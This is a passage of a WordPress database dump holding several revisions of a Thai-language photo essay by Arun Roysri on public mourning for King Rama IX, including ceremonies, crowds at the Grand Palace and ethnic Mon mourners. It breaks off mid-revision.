(4342, 3, '2018-11-12 10:06:25', '2018-11-12 03:06:25', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n ', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 10:06:25', '2018-11-12 03:06:25', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4344, 3, '2018-11-12 10:09:40', '2018-11-12 03:09:40', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\"> พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชน ที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 10:09:40', '2018-11-12 03:09:40', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4345, 3, '2018-11-12 11:00:27', '2018-11-12 04:00:27', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n \r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /> <img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 11:00:27', '2018-11-12 04:00:27', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4346, 3, '2018-11-12 11:31:07', '2018-11-12 04:31:07', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n \r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /> <img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 11:31:07', '2018-11-12 04:31:07', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4347, 3, '2018-11-12 11:33:23', '2018-11-12 04:33:23', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p 